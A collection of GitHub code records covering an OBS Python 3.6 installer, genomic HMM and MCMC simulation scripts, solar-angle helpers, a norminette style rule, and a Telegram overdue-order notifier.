+{"seq_id":"35827993519","text":"from os import environ\nfrom winreg import *\nfrom urllib.request import urlretrieve\nfrom subprocess import run\n\npython_install_key=R'SOFTWARE\\Python\\PythonCore\\3.6\\InstallPath'\npython_url_64='https://www.python.org/ftp/python/3.6.8/python-3.6.8-amd64.exe'\npython_url_32='https://www.python.org/ftp/python/3.6.8/python-3.6.8.exe'\npython_installer_args=' /passive Include_launcher=0 AssociateFiles=0 Shortcuts=0'\nis64='64' in environ['PROCESSOR_ARCHITECTURE'] or '64' in environ['PROCESSOR_ARCHITEW6432']\nglobal_ini_path=environ['appdata']+'/obs-studio/global.ini'\ninstall_path=None\n\ndef ensureInstallPath()->str:\n print('Searching for conflicting python installs')\n try:\n install_path=QueryValue(HKEY_LOCAL_MACHINE, python_install_key)\n print('System python 3.6 found')\n return install_path\n except:\n print('System python 3.6 not found')\n try:\n install_path=QueryValue(HKEY_CURRENT_USER, python_install_key)\n print('User python 3.6 found')\n return install_path\n except:\n print('User python 3.6 not found')\n print('downloading python')\n python_installer=None\n if is64:\n python_installer=urlretrieve(python_url_64)[0]\n else:\n python_installer=urlretrieve(python_url_32)[0]\n print('Installing python')\n run(python_installer+python_installer_args)\n return QueryValue(HKEY_CURRENT_USER, python_install_key)\n\ndef main():\n input('Make sure OBS is closed, then press enter to continue.')\n install_path=ensureInstallPath()\n print('Using '+install_path)\n print('Updating OBS config')\n from configparser import ConfigParser\n config=ConfigParser(strict=False)\n global_ini=open(global_ini_path,'r+',encoding='utf-8')\n config.read_string(global_ini.read().replace('\\ufeff',''))\n if is64:\n keyname='path64bit'\n else:\n keyname='path32bit'\n if config.has_section('Python'):\n config['Python'][keyname]=install_path\n else:\n config['Python']={keyname:install_path}\n global_ini.seek(0)\n global_ini.truncate()\n config.write(global_ini,space_around_delimiters=False)\n global_ini.close()\n input('\\nOBS can now use python 3.6 scripts\\nYou can close this window\\nor press enter to exit')\n\nif __name__ == '__main__':\n main()","repo_name":"sugoidogo/obs-python-installer","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"42738503902","text":"\"\"\"\nThis is a wrapper script to run HMMs (pomegranate or hmmlearn)\nwith a few bells and whistles\nv1.3\n\"\"\"\n#!/bin/env python\nimport argparse\nimport bbi\nimport numpy as np\nimport pandas as pd\nimport bioframe\nfrom pomegranate import HiddenMarkovModel, NormalDistribution\nimport matplotlib.pyplot as plt\n\n\ndef get_chroms(genome, ignoreXYMT=True):\n \"Get list of chroms to analyze\"\n print(\"Using chroms from \" + genome)\n chromsizes = bioframe.fetch_chromsizes(genome, filter_chroms=True)\n chr_list = list(chromsizes.index)\n if ignoreXYMT == True:\n chr_list = [i for i in chr_list if i not in (\"chrM\", \"chrX\", \"chrY\")]\n return chr_list\n\n\ndef create_df(inputfile, chroms):\n \"Create dataframe from bigwig\"\n df = pd.DataFrame(columns=[\"chrom\", \"start\", \"end\", \"value\"])\n for item in chroms:\n ivals = list(bbi.fetch_intervals(inputfile, item, 0, -1))\n df_new = pd.DataFrame(ivals, columns=[\"chrom\", \"start\", \"end\", \"value\"])\n df = df.append(df_new, ignore_index=True)\n return df\n\n\ndef hmm(df, num_states):\n \"HMM program\"\n # df['value']=df['value'].replace(0,np.nan) #this removes unmappable areas of chr\n # df_dropna=df.dropna(subset=['value']) #this removes unmappable areas of chr (NaN is otherwise considered 0)\n vals = df[\"value\"].values\n model = HiddenMarkovModel.from_samples(\n NormalDistribution, X=[vals], n_components=num_states\n )\n states = model.predict(vals)\n\n # Rename states to increase with mean signal\n order = np.argsort(df['value'].groupby(states).mean())\n states = [order[s] for s in states]\n df[\"state\"] = states\n df['state'][np.isnan(df['value'])] = np.nan\n return df\n\n\ndef sparse(df):\n \"Merge neighboring bins with same state\"\n chr_list = []\n start_list = []\n state_list = []\n end_list = []\n\n for item in df[\"chrom\"].unique():\n chrom_df = df[df[\"chrom\"] == item].reset_index()\n\n chr_list.append((chrom_df[\"chrom\"].iloc[0]))\n start_list.append((chrom_df[\"start\"].iloc[0]))\n state_list.append((chrom_df[\"state\"].iloc[0]))\n for index, row in chrom_df[1:].iterrows():\n if chrom_df[\"state\"].iloc[index] == chrom_df[\"state\"].iloc[(index - 1)]:\n continue\n else:\n end_list.append(chrom_df[\"end\"].iloc[(index - 1)])\n chr_list.append(chrom_df[\"chrom\"].iloc[index])\n start_list.append(chrom_df[\"start\"].iloc[index])\n state_list.append(chrom_df[\"state\"].iloc[index])\n if len(start_list) != len(end_list):\n end_list.append(chrom_df[\"end\"].iloc[(index)])\n\n keys = [\"chrom\", \"start\", \"end\", \"state\"]\n values = [chr_list, start_list, end_list, state_list]\n dictionary = dict(zip(keys, values))\n df_sparse = pd.DataFrame.from_dict(dictionary)\n return df_sparse.dropna()\n\n\ndef merge_different_hmmstates(df, cLAD, open):\n \"merge strong and weak HMM states into 2 \"\n import pandas as pd\n\n chr_list = []\n start_list = []\n end_list = []\n weak = int(3 - (cLAD + open))\n\n for item in df[\"chrom\"].unique():\n chrom_df = df[df[\"chrom\"] == item]\n start = 1\n for index, row in chrom_df.iterrows():\n if start == 1:\n if df[\"state\"].iloc[index] == cLAD or df[\"state\"].iloc[index] == weak:\n chr_list.append(df[\"chrom\"].iloc[index])\n start_list.append(df[\"start\"].iloc[index])\n start = 0\n continue\n else:\n continue\n elif df[\"state\"].iloc[index] == open:\n end_list.append(df[\"end\"].iloc[(index - 1)])\n start = 1\n else:\n continue\n if start == 0:\n end_list.append(df[\"end\"].iloc[(index)])\n\n if len(chr_list) != len(start_list) or 
len(start_list) != len(end_list):\n            print(\"Wrong Lengths!\")\n            break\n\n    # the merged intervals carry no per-bin state column, so only three keys are zipped\n    keys = [\"chrom\", \"start\", \"end\"]\n    values = [chr_list, start_list, end_list]\n    dictionary = dict(zip(keys, values))\n    df_merge = pd.DataFrame.from_dict(dictionary)\n    return df_merge\n\ndef write_to_file(df, outputfile, num_states, cmap='coolwarm'):\n    states = list(range(num_states))\n    cmap = plt.get_cmap(cmap)\n    colors = {s:cmap(s/states[-1]) for s in states}\n    df[\"score\"] = \"0\"\n    df[\"strand\"] = \".\"\n    filename = outputfile + \"_\" + str(num_states) + \"_state_HMM_colored.bed\"\n    df['RGB'] = df[\"state\"].apply(lambda x: ','.join([str(int(round(c*255))) for c in colors[x][:-1]]))\n    cols_to_keep = [\n        \"chrom\",\n        \"start\",\n        \"end\",\n        \"state\",\n        \"score\",\n        \"strand\",\n        \"start\",\n        \"start\",\n        \"RGB\",\n    ]\n    df.to_csv(filename, sep=\"\\t\", header=False, columns=cols_to_keep, index=False)\n","repo_name":"gspracklin/hmm_bigwigs","sub_path":"hmm_bigwigs/bigwig_hmm.py","file_name":"bigwig_hmm.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
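One non-obvious step in the `hmm()` function of the record above is relabelling the raw HMM state ids so that the labels increase with mean signal. A self-contained sketch of that idea with toy numbers (independent of the repo's code): note that mapping each label to its rank takes argsort applied twice, since a single argsort yields the inverse permutation.

```python
import numpy as np

# Toy relabelling: make state ids follow mean signal (0 = lowest mean).
states = np.array([0, 0, 1, 2, 2, 1])
values = np.array([5.0, 6.0, 0.5, 2.0, 3.0, 1.5])

means = np.array([values[states == s].mean() for s in range(3)])  # [5.5, 1.0, 2.5]
ranks = np.argsort(np.argsort(means))                             # [2, 0, 1]
relabelled = ranks[states]

assert relabelled.tolist() == [2, 2, 0, 1, 1, 0]
```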
+{"seq_id":"3913580581","text":"# Given a string, return the number of substrings of length three where there are no repeated characters.\n# Note that if there are multiple occurrences of the same substring, every occurrence should be counted.\n\ndef length_three_substrings(string):\n if len(string) < 3:\n return 0\n \n pointer1 = 0\n pointer2 = 3\n count = 0\n condition = False\n\n while pointer2 <= len(string):\n temp = ''\n for i in range(pointer1, pointer2):\n if temp.count(string[i]) > 0:\n condition = True\n temp += string[i]\n \n if condition == False:\n count += 1\n\n pointer1 += 1\n pointer2 += 1\n\n return count\n\nprint(length_three_substrings(\"abcdef\"))","repo_name":"alyliann/SEO-PreWork","sub_path":"No-Repeating-Characters.py","file_name":"No-Repeating-Characters.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72650147746","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 20 09:37:31 2016\n\n@author: geddesag\n\"\"\"\nfrom numpy import *\nimport numpy as np\nimport datetime\nimport ephem\nimport time\n\n\ndef decdeg2dms(dd):\n \"\"\"Converts decimal degrees to degrees minutes seconds\"\"\"\n is_positive = dd >= 0\n dd = abs(dd)\n minutes,seconds = divmod(dd*3600,60)\n degrees,minutes = divmod(minutes,60)\n degrees = degrees if is_positive else -degrees\n return str(int(degrees))+\":\"+str(int(minutes))+\":\"+str(seconds)\n\ndef sunzen_ephem(time,Lat,Lon,psurf,temp):\n \"\"\"Calculates the solar zenith and azimuth angles for a given datetime object (utc), \n latitude (deg), longitude (deg), psurf(mb), temp(deg c)\"\"\"\n observer = ephem.Observer()\n observer.lon = decdeg2dms(Lon)\n observer.lat = decdeg2dms(Lat)\n observer.date = time\n \n \n \"\"\"If you dont want to consider refraction effects, set observer.pressure to 0\"\"\"\n observer.pressure=psurf\n observer.temp=temp\n \n #observer.compute_pressure()\n \"\"\"We can also include the observer altitude, this is for the geometric difference that you would get\n rather than any difference in pressure, which has already been handled. Its largely irrelevant unless you\n are 10s of km high\"\"\"\n \n #observer.altitude=30000 #metres\n \n \"\"\"set what we are looking at, if we want the moon, we can change to moon = ephem.Moon(observer)\n and then change the subsequent code to call moon.alt or moon.az\"\"\"\n \n sun = ephem.Sun(observer)\n # sun.compute(observer)\n alt_atr = float(sun.alt)\n solar_altitude=180.0*alt_atr/pi\n solar_zenith=90.0-solar_altitude\n solar_azimuth=180*float(sun.az)/pi\n return solar_zenith, solar_azimuth\n \ndef moonzen_ephem(time,Lat,Lon,psurf,temp):\n \"\"\"Calculates the solar zenith and azimuth angles for a given datetime object (utc), \n latitude (deg), longitude (deg), psurf(mb), temp(deg c)\"\"\"\n observer = ephem.Observer()\n observer.lon = decdeg2dms(Lon)\n observer.lat = decdeg2dms(Lat)\n observer.date = time\n \n \n \"\"\"If you dont want to consider refraction effects, set observer.pressure to 0\"\"\"\n observer.pressure=psurf\n observer.temp=temp\n \n #observer.compute_pressure()\n \"\"\"We can also include the observer altitude, this is for the geometric difference that you would get\n rather than any difference in pressure, which has already been handled. 
Its largely irrelevant unless you\n are 10s of km high\"\"\"\n \n #observer.altitude=30000 #metres\n \n \"\"\"set what we are looking at, if we want the moon, we can change to moon = ephem.Moon(observer)\n and then change the subsequent code to call moon.alt or moon.az\"\"\"\n \n moon = ephem.Moon(observer)\n # sun.compute(observer)\n alt_atr = float(moon.alt)\n moon_altitude=180.0*alt_atr/pi\n moon_zenith=90.0-moon_altitude\n moon_azimuth=180*float(moon.az)/pi\n return moon_zenith, moon_azimuth\n \n \ndef format_time(datetime_obj):\n \"\"\"Quick function that formats a datetime object in to HH:MM:SS string format\"\"\"\n out =str('%02d:%02d:%02d' % (int(datetime_obj.hour), int(datetime_obj.minute), int(datetime_obj.second)))\n return out\n \ndef find_nearest(array,value):\n \"\"\"Finds the index in array where the array element is closest to the value argument\"\"\"\n idx = (np.abs(array-value)).argmin()\n return idx\n \n \ndef sza_info(lat,lon,utc_offset,psurf,temp):\n \"\"\"Calculates useful information for Today based on latitude(deg), longitude(deg),\n utc offset, surface pressure (mb) and temperature (deg C)\n \"\"\"\n time_utc=datetime.datetime.utcnow() #Todays date and time in UTC\n \n time_local=time_utc+datetime.timedelta(hours=utc_offset) #Local date and time\n \n \n times_local=[]\n sza_ref=[] \n times_utc=[]\n \n \"\"\"This takes a bit of explaining...Its a loop calculating the sza at different times. However it is \n not so simple. Because ephem works exclusively in utc time we have to calculate a time array of that\n but it has to represent one day at the location, from midnight to midnight. Thats why I start the array\n at local day at 0:0:0, with a subtraction of the utc_offset, and then iterate over the calculation every day.\n I can probably make this cleaner by using different datetime functions, but because I regularly look at utc\n or local times, it made sense to keep everything as dependent on that than anything else.\"\"\"\n \n for i in range(86400):\n times_utc.append(datetime.datetime(time_local.year,time_local.month,time_local.day,0,0,0)+datetime.timedelta(seconds=i)-datetime.timedelta(hours=utc_offset))\n sza_ref.append(sunzen_ephem(times_utc[i],lat,lon,psurf,temp)[0])\n times_local.append(times_utc[i]+datetime.timedelta(hours=utc_offset))\n\n\n\n\n \"\"\"Now we look through the sza reference array to find the max and minimum values and note there index\"\"\"\n sza_time_local=[]\n high_sun_idx=where(array(sza_ref)==min(array(sza_ref)))[0][0]\n low_sun_idx=where(array(sza_ref)==max(array(sza_ref)))[0][0]\n high_sun_sza=sza_ref[high_sun_idx]\n low_sun_sza=sza_ref[low_sun_idx]\n high_sun_time=format_time(times_local[high_sun_idx].time())\n low_sun_time=format_time(times_local[low_sun_idx].time())\n\n \"\"\"To find sunrise and sunset is a little trickier. I use a find nearest function to find the index of \n the array where it is closest to 90 degrees. I do this twice, once before the high sun index (midday)\n and once for the rest of the day. This guarantees we find sunrise and sunset. Currently we define sunrise at \n SZA = 90 but this could be adjusted easily. \"\"\"\n sunrise_idx=find_nearest(array(sza_ref[0:high_sun_idx]),90.0)\n sunset_idx=find_nearest(array(sza_ref[high_sun_idx:]),90.0)+high_sun_idx\n sunrise_s=sza_ref[sunrise_idx]\n sunset_s=sza_ref[sunset_idx]\n \n sunrise=times_local[sunrise_idx]\n sunset=times_local[sunset_idx]\n \n \n day_length=str(times_local[sunset_idx]-times_local[sunrise_idx])\n \n \"\"\"Last little thing, may or may not be useful. 
if nearest value to 90 is above 91 or below 89, \n the sun is permanently set or risen. So I return an n/a value for the formatted string.\"\"\"\n \n if sunrise_s<=89 or sunrise_s>=91.:\n sunrise=\"n/a\"\n day_length=\"n/a\"\n \n if sunset_s<=89 or sunset_s>=91.:\n sunset=\"n/a\" \n day_length=\"n/a\"\n \n \"\"\"Here is a quick plot of the sza in local and utc time\"\"\"\n# fig=figure(1)\n# ax1=fig.add_subplot(111)\n# ax1.plot(times_local,sza_ref)\n# show()\n \n \"\"\" Note the slight wobbles around sza 92, due to refraction, otherwise smooth\"\"\"\n\n\n return high_sun_time, high_sun_sza, low_sun_time, low_sun_sza, sunrise, sunset, day_length,times_local,sza_ref\n ","repo_name":"geddes88/CamPy4Pi","sub_path":"solar_calc.py","file_name":"solar_calc.py","file_ext":"py","file_size_in_byte":6754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
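A minimal usage sketch for the helpers in the record above. The import path assumes the file is importable as solar_calc (its file name in this record); the coordinates, pressure, and temperature are illustrative values, not from the original repo.

```python
import datetime
from solar_calc import sunzen_ephem, moonzen_ephem

lat, lon = -45.0, 169.7        # observer position in degrees (illustrative)
psurf, temp = 1013.0, 15.0     # surface pressure (mb) and temperature (deg C)

now_utc = datetime.datetime.utcnow()
sza, saz = sunzen_ephem(now_utc, lat, lon, psurf, temp)
mza, maz = moonzen_ephem(now_utc, lat, lon, psurf, temp)
print("sun: zenith %.2f deg, azimuth %.2f deg" % (sza, saz))
print("moon: zenith %.2f deg, azimuth %.2f deg" % (mza, maz))
```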
+{"seq_id":"41601900979","text":"import sys\nimport torch \nimport pickle\nimport argparse\nfrom pathlib import Path\n\nimport plotly \nimport plotly.graph_objs as go\nfrom plotly import tools \n\nif __name__ == '__main__': \n\n parser = argparse.ArgumentParser(description='Argument Parser') \n parser.add_argument('--data', type=str, default='ecg', \n help='type of the dataset (ecg, gesture, power_demand, space_shuttle, respiration, nyc_taxi')\n parser.add_argument('--filename', type=str, default='chfdb_chf13_45590.pkl', help='filename of the dataset') \n\n args = parser.parse_args() \n\n root_path = Path('kmeans', args.data, args.filename)\n center = torch.load(str(root_path.joinpath('kmeans.pt'))) \n centers = center.view(-1,64,2) \n\n fig = tools.make_subplots(rows=4, cols=5) \n\n for i in range(centers.size(0)):\n\n for j in range(2): \n\n if j==0:\n c = 'rgb(205,12,24)' \n else:\n c = 'rgb(22, 96, 167)' \n\n trace_normal = go.Scatter( \n x = torch.range(0, 63), \n y = centers[i][:,j], \n mode = 'lines', \n line = dict(color=c), \n )\n \n fig['layout']['xaxis%d'%(i+1+j*10)].update(showgrid=False, zeroline=False, showline=True, mirror='ticks', showticklabels=False)\n fig['layout']['yaxis%d'%(i+1+j*10)].update(showgrid=False, zeroline=False, showline=True, mirror='ticks', showticklabels=False)\n \n print(i//5+1+(j)*2, i%5+1) \n fig.append_trace(trace_normal, i//5+1+(j)*2, i%5+1) \n\n plotly.offline.plot(fig) \n","repo_name":"YongHoYoo/AnomalyDetection","sub_path":"3_display_kmeans.py","file_name":"3_display_kmeans.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"70"}
+{"seq_id":"45328368743","text":"def acceleration_formula(v_0, v_max, x_remaining, a):\n # Make sure everything is a float!\n v_0 = float(max(v_0, 0))\n v_max = float(v_max)\n x_remaining = float(max(x_remaining, 0))\n a = float(a)\n\n if abs(v_0 - v_max) <= 1e-5:\n # Assume that they are already equal, as otherwise there might be some catastrophic rounding\n return (v_max, x_remaining / v_max)\n\n if x_remaining <= 1e-3:\n return (v_0, 0.0)\n\n # Solve x = v_0 * t + 0.5 * a * t^2 for t\n # Equivalent to 0.5 * a * t^2 + v_0 * t - x = 0\n d = v_0**2 - 2 * a * (-x_remaining)\n t_1 = (-v_0 + d**0.5) / a\n t_2 = (-v_0 - d**0.5) / a\n t_solve = max(t_1, t_2)\n\n # Determine the velocity we have at the end, with this acceleration\n v = v_0 + a * t_solve\n\n # Check if we would go too fast\n if v > v_max:\n # We would go to fast, so cap it\n # First check at what time we reach the velocity\n t_v_max = (v_max - v_0) / a\n\n # Now find out at what place we reach this, and the remaining distance\n x_a = v_0 * t_v_max + a / 2 * t_v_max**2\n x_i = x_remaining - x_a\n\n # Now travel the first part with acceleration, but the final part at maximal velocity\n t = t_v_max + x_i / v_max\n return (v_max, t)\n else:\n # Everything is fine\n return (v, t_solve)\n\ndef brake_formula(v_0, t_poll, x_remaining):\n v_0 = float(v_0)\n t_poll = float(t_poll)\n x_remaining = float(x_remaining)\n\n if v_0 <= 1e-4 or x_remaining <= 1e-4:\n return (0, 0)\n\n # Find out how long it takes in seconds to stop in the alloted distance\n t = 2 * x_remaining / v_0\n\n # Find the acceleration we needed to do this\n a = -v_0 / t\n\n # Determine the values after the polling interval\n new_v = v_0 + a * t_poll\n x_travelled = v_0 * t_poll + a / 2 * t_poll**2\n\n # Make sure it is positive\n new_v = max(new_v, 0)\n x_travelled = max(x_travelled, 0)\n\n return (new_v, x_travelled)\n\n","repo_name":"baturayo/Modeling-of-Software-Intensive-Systems","sub_path":"DEVS Modelling and Simulation/Models/formulas.py","file_name":"formulas.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"71634615911","text":"######################\n\n###### required modules ######\nexec(open('import_modules.py').read())\nexec(open('Graph_decomposition.py').read())\nexec(open('MCMC_run.py').read())\nexec(open('multi_stage_lasso.py').read())\nexec(open('MCMC_prediction.py').read())\nexec(open('simulation_generate.py').read())\n\n\n\n###### generate graph and non-gaussian process ######\nn = 300\np = 0.28\nG_sim,pos = generate_random_geometric_graph(n, p, 1)\n\nprint(len(G_sim.edges))\n\n## compute matrix and eigenvalue/vectors\n_, _, _, L_lambda_set, L_lambda_vec = graph_matrix_eigen(G_sim)\n\nprint('finished graph-------')\n\n## kernels\nJ = 2\nK_par= 1\nlambda_max = L_lambda_set[-1]\ng_vals, h_vals,_ = kernal_gh(lambda_set = L_lambda_set,\n J=J,lambda_max=lambda_max,K=K_par, x1=1, x2=2)\n\nprint('finished kernels-------')\n\n## wavelets and scaling\nstart = time.time()\n\nphi_set2 = np.zeros((n,n))\nfor vi in range(n):\n for ui in range(vi+1):\n phi_set2[vi,ui] = phi(vi,ui,L_lambda_set,L_lambda_vec,h_vals)\n\nphi_set = phi_set2 + phi_set2.T - np.diag(phi_set2.diagonal())\n\npsi_set = np.zeros((J,n,n))\npsi_set2 = np.zeros((J,n,n))\nfor j in range(J):\n for vi in range(n):\n for ui in range(vi+1):\n psi_set2[j,vi,ui] = psi(j,vi,ui,L_lambda_set,L_lambda_vec,g_vals)\n psi_set[j,:,:] = psi_set2[j,:,:] + psi_set2[j,:,:].T - np.diag(psi_set2[j,:,:].diagonal())\n\ndel psi_set2, phi_set2\nprint(time.time()-start)\n\nprint('finished wavelets-------')\n\n## porcess Z\nK=7\nsigma2_true = np.array([6*(2.5)**(-(j+1)) for j in range(J)])\ntau2_true = 1\nsigma2_0_true = 0.5\n\n## set prior parametres for sigma_j^2 tau^2 tau^2_d\npara_prior_names = ['alpha_0','beta_0','s','alpha_j','beta_j','alpha_tau2','beta_tau2']\npara_prior_values =[np.array([1.2]),np.array([4]),np.array([4]),\n np.array([5,5]),np.array([1,1]),np.array([1.2]),np.array([4])]\npara_prior = dict()\nfor i in range(len(para_prior_names)):\n para_prior[para_prior_names[i]] = para_prior_values[i]\n\nZ, comp_mat = generate_Z(scaling_func = phi_set, wavelet_func = psi_set,\n K=K, sigma2 = sigma2_true,\n tau2=tau2_true,sigma2_0 = sigma2_0_true ,s = para_prior['s'])\n\ndesign_mat = {mat: val for mat, val in comp_mat.items() if mat in ['P','R', 'A']}\nprint('Z dim: '+str(Z.shape[1]))\nprint('finished generating process-------')\n\ntrue_para = dict(sigma2=sigma2_true, tau2 = np.array([tau2_true]), sigma2_0=np.array([sigma2_0_true]), \n C = comp_mat['C'], V=comp_mat['V'], D=comp_mat['D'])\n\n\n\n###### multi-stage-lasso for prior determination ######\n## if missing data is preferred, it can implemented by rate argument (ranging from 0 to 1)\nZ_full, design_mat_full, M_full, _,_ = generate_missing_value(Z, design_mat, rate=0)\nstart = time.time()\nsummary = graph_KFold(Z_full, design_mat_full, M_full, \n alpha1 = np.arange(0.0005,0.0021,0.0001), \n alpha2 = np.arange(0.0001,0.00045,0.00005),\n l1_ratio = 1.0,\n s = para_prior['s'][0],\n n_splits=10, seed_splits=1)\nprint(str(np.round(time.time()-start,4))+'s')\n\n## one can determined the optimal based on certain metrics\nest_var = list(summary[sub_result['MPE']==summary['MPE'].min()].iloc[0,3:7])\npara_prior['beta_0'] = (para_prior['alpha_0']-1)*est_var[1]\npara_prior['beta_j'] = (para_prior['alpha_j'])/est_var[2:]\npara_prior['beta_tau2'] = (para_prior['alpha_tau2']-1)*est_var[0]\n\n\n\n\n\n###### MCMC run #######\nprint('start MCMC-------')\nstart = time.time()\n# mcmc_server = adaptive_MCMC_process(Z,design_mat, para_init = true_para,para_prior=para_prior,\n# num_iter=120000,seed=10, 
print_info=False)\n\n#para_init = true_para\nprint('using initial vars a bit deviated from the truth ---')\nprint('the initial values of C, D and V are specified as zero matrices, and an all-ones matrix, respectively.')\npara_init_var = dict(sigma2=np.array(est_var[2:]), \n                     tau2 = np.array([est_var[0]]), \n                     sigma2_0=np.array([est_var[1]]))\n\npara_init = dict(sigma2= para_init_var['sigma2']+0.1, \n                 tau2 = para_init_var['tau2']+0.1, \n                 sigma2_0= para_init_var['sigma2_0']-0.2, \n                 C = np.zeros((n*J,K)), \n                 V = np.ones((n*J,K)), \n                 D = np.zeros((n,K)))\n\nprint(para_prior)\n\n# NOTE (assumption): the four names below are referenced by the sampling loop but were\n# never defined in this script; they are aliased here to the objects built above so the\n# driver can run end to end. Adjust to taste.\nZ_process, design_mat_process = Z_full, design_mat_full\nn_obs = Z_full.shape[0]    # assumed: number of observation rows\noutput = 'sim_MCMC'        # assumed checkpoint filename prefix\nskip_size = 50             # assumed thinning interval, matching the interim checkpoints\n\nnum_iter = 200000\nsamples = [0]*(num_iter+1)\nsamples[0] = para_init.copy()\nold_para = para_init.copy()\n# np.random.seed(seed)\nfor m in range(1,num_iter+1):\n    new_para = adaptive_MCMC_one_new(Z=Z_process, design_mat=design_mat_process, \n                                     old_para=old_para,\n                                     para_prior=para_prior,\n                                     n_obs = n_obs,\n                                     true_step1=False, true_step2=False,\n                                     true_step3=False, true_step4=False,\n                                     true_step5=False, true_step6=False,print_info=False)\n    samples[m] = new_para.copy()\n    old_para = new_para.copy()\n    if m%500 == 0:#print_info is True:\n        print('iter -- '+str(m))\n    if m == 50000:\n        mcmc_thin_p1 = thin_MCMC(samples[:(m+1)], 50)\n        with open(output+'_p1.pickle', 'wb') as f:\n            pickle.dump(mcmc_thin_p1,f)\n    if m == 100000:\n        mcmc_thin_p2 = thin_MCMC(samples[:(m+1)], 50)\n        with open(output+'_p2.pickle', 'wb') as f:\n            pickle.dump(mcmc_thin_p2,f)\n    if m == 150000:\n        mcmc_thin_p3 = thin_MCMC(samples[:(m+1)], 50)\n        with open(output+'_p3.pickle', 'wb') as f:\n            pickle.dump(mcmc_thin_p3,f)\n\nprint('time spent on MCMC:'+str(time.time()-start)) \nprint('finished MCMC-------')\n\nmcmc_thin = thin_MCMC(samples, skip_size)\n\n# with open('sim_MCMC.pickle', 'wb') as f:\n#     pickle.dump(mcmc_thin,f)\n\n \n###### prediction and performance ######\n\nstart = time.time()\nZ_post_pred = sample_post_Z(mcmc_thin,design_mat, L=500)\nprint(str(time.time()-start)+'s')\n\npred_score(Z_post_pred,Z,n,K) ## return a table of metrics\n\n\n\n\n","repo_name":"sstliao/BayesianGraph","sub_path":"test/example_test.py","file_name":"example_test.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"9451518739","text":"from norminette.rules import Rule\n\n\nclass CheckBrace(Rule):\n def __init__(self):\n super().__init__()\n self.depends_on = [\"IsBlockStart\", \"IsBlockEnd\"]\n\n def run(self, context):\n \"\"\"\n C files must end with an empty line\n Functions can only have 25 lines\n \"\"\"\n i = 0\n i = context.skip_ws(i, nl=False)\n # if context.check_token(i, [\"RBRACE\", \"LBRACE\"]) is False and context.scope.type != \"GlobalScope\":\n # context.new_error(\"BRACE_EMPTY_LINE\")\n if context.check_token(i, [\"RBRACE\", \"LBRACE\"]) is False:\n context.new_error(\"EXPECTED_BRACE\", context.peek_token(i))\n return False, 0\n i += 1\n i = context.skip_ws(i, nl=False)\n if context.check_token(i, \"NEWLINE\") is True and context.check_token(i - 1, [\"SPACE\", \"TAB\"]):\n context.new_error(\"SPC_BEFORE_NL\", context.peek_token(i - 1))\n if context.check_token(i, \"NEWLINE\") is False or context.check_token(i, \"NEWLINE\") is None:\n if context.scope.name == \"UserDefinedType\" or context.scope.name == \"UserDefinedEnum\":\n i = context.skip_ws(i, nl=False)\n if context.check_token(i, \"SEMI_COLON\") is True:\n return False, 0\n if context.check_token(i, \"IDENTIFIER\") is False:\n context.new_error(\"BRACE_SHOULD_EOL\", context.peek_token(i - 1))\n else:\n i += 1\n if context.check_token(i, \"SEMI_COLON\") is False:\n context.new_error(\"BRACE_SHOULD_EOL\", context.peek_token(i - 1))\n else:\n context.new_error(\"BRACE_SHOULD_EOL\", context.peek_token(i - 1))\n if context.scope.name == \"Function\" and context.scope.lines > 26:\n context.new_error(\"TOO_MANY_LINES\", context.peek_token(0))\n return False, 0\n","repo_name":"42School/norminette","sub_path":"norminette/rules/check_brace.py","file_name":"check_brace.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":743,"dataset":"github-code","pt":"71"}
+{"seq_id":"16659583562","text":"import json\nimport logging\nfrom datetime import datetime as dt\nfrom backend.dbModels.order import Order\nfrom backend.dbModels.order import db\nfrom telebot import TeleBot\nfrom pathlib import Path\n\nfrom sqlalchemy import and_\n\n\ndef send_notification(message_data: Order | str) -> None:\n \"\"\"\n The function of sending a notification on an overdue order\n :param message_data: Expired order model or message to send\n :return:\n \"\"\"\n with open(Path(Path.cwd(), \"config\", \"config.json\"), 'r') as file:\n config_data = json.load(file)\n telegram_bot = TeleBot(config_data['telegram_bot_token'])\n if type(message_data) == Order:\n message_to_send = f\"Expired order {message_data}\"\n else:\n message_to_send = message_data\n for telegram_user_for_notification in config_data['telegram_users_for_notifications']:\n try:\n telegram_bot.send_message(telegram_user_for_notification, message_to_send)\n except Exception as ex:\n logging.warning(f\"Cannot send notification to user {telegram_user_for_notification} by order \"\n f\"{message_data.order_id}. {ex}\")\n\n\ndef send_notifications_of_overdue_orders() -> int:\n \"\"\"\n Function to receive expired orders and start sending notifications on them\n :return: Number of notifications sent\n \"\"\"\n today = dt.now().date()\n count_notifications = 0\n for order in db.session.query(Order).filter(and_(Order.delivery_time < today, Order.notification_is_send == False)):\n count_notifications += 1\n send_notification(order)\n order.notification_is_send = True\n db.session.commit()\n return count_notifications\n","repo_name":"Azrail6666/TestOrders","sub_path":"services/backend/backend/telegram_notifications.py","file_name":"telegram_notifications.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
